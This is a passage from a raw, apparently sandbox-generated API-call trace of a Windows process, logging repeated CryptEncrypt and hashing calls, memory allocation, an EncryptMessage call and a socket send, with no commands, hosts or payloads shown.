hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f8d8*, pdwDataLen=0x339f83c*=0x10, dwBufLen=0x10 | out: pbData=0x339f8d8*, pdwDataLen=0x339f83c*=0x10) returned 1 [0138.113] CryptDestroyKey (hKey=0x432978) returned 1 [0138.113] CryptHashData (hHash=0x432bf8, pbData=0x3def350, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0138.113] CryptDuplicateHash (in: hHash=0x432bf8, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fa24 | out: phHash=0x339fa24) returned 1 [0138.113] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f65380, pdwDataLen=0x339f9bc, dwFlags=0x0 | out: pbData=0x3f65380, pdwDataLen=0x339f9bc) returned 1 [0138.113] CryptDestroyHash (hHash=0x432978) returned 1 [0138.113] free (_Block=0x3f65380) [0138.113] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.113] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.113] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.113] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.114] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.115] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.115] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.115] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.115] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.115] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.115] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.115] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.115] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.115] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.115] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.115] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f974*=0x10) returned 1 [0138.115] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339f9ac, MessageSeqNo=0x0 | out: pMessage=0x339f9ac) returned 0x0 [0138.115] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0138.116] free (_Block=0x3def350) [0138.116] free (_Block=0x3d81e60) [0138.116] free (_Block=0x60cdc0) [0138.116] free (_Block=0x3df0420) [0138.116] free (_Block=0x3df0530) [0138.116] GetTickCount () returned 0x1163773 [0138.116] malloc (_Size=0x10) returned 0x3648e78 [0138.116] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e78*=0x5c8, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0138.116] free (_Block=0x3648e78) [0138.116] GetTickCount () returned 0x1163773 [0138.116] malloc (_Size=0x10) returned 0x3648e48 [0138.116] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e48*=0x5c8, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0142.066] free (_Block=0x3648e48) [0142.066] GetTickCount () returned 0x11646c5 [0142.067] malloc (_Size=0x78) returned 0x3d66630 [0142.067] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5d0 [0142.067] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5d4 [0142.067] malloc (_Size=0x20) returned 0x3d802b0 [0142.067] free (_Block=0x0) [0142.067] SetEvent (hEvent=0x5c8) returned 1 [0142.067] free (_Block=0x0) [0142.067] malloc (_Size=0x1fd) returned 0x3df0420 [0142.067] free (_Block=0x0) [0142.067] CryptHashData (hHash=0x432d78, pbData=0x3df0420, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0142.067] CryptDuplicateHash (in: hHash=0x432d78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fa54 | out: phHash=0x339fa54) returned 1 [0142.067] malloc (_Size=0x14) returned 0x3f65460 [0142.068] free (_Block=0x0) [0142.069] CryptGetHashParam (in: hHash=0x432db8, dwParam=0x2, pbData=0x3f65460, pdwDataLen=0x339f9ec, dwFlags=0x0 | out: pbData=0x3f65460, pdwDataLen=0x339f9ec) returned 1 [0142.069] CryptDestroyHash (hHash=0x432db8) returned 1 [0142.069] free (_Block=0x3f65460) [0142.069] malloc (_Size=0x1fd) returned 0x3def350 [0142.069] free (_Block=0x0) [0142.069] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.069] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.069] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.069] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.069] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.070] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.071] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.071] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.071] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.071] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.071] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.071] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.071] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.071] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.071] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.071] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x3d81ea4*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.071] malloc (_Size=0x1fd) returned 0x3def558 [0142.071] free (_Block=0x0) [0142.071] free (_Block=0x0) [0142.071] free (_Block=0x3def350) [0142.071] free (_Block=0x3df0420) [0142.071] malloc (_Size=0x1fd) returned 0x3def350 [0142.071] free (_Block=0x0) [0142.072] malloc (_Size=0x1fd) returned 0x3df0420 [0142.072] free (_Block=0x0) [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.072] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.073] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.074] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.074] CryptEncrypt (in: hKey=0x432cb8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f9a4*=0x10) returned 1 [0142.074] malloc (_Size=0x1fd) returned 0x60cdc0 [0142.074] free (_Block=0x0) [0142.074] free (_Block=0x3def558) [0142.074] free (_Block=0x3df0420) [0142.074] free (_Block=0x3def350) [0142.074] malloc (_Size=0x202) returned 0x3df0420 [0142.074] free (_Block=0x0) [0142.074] EncryptMessage (in: 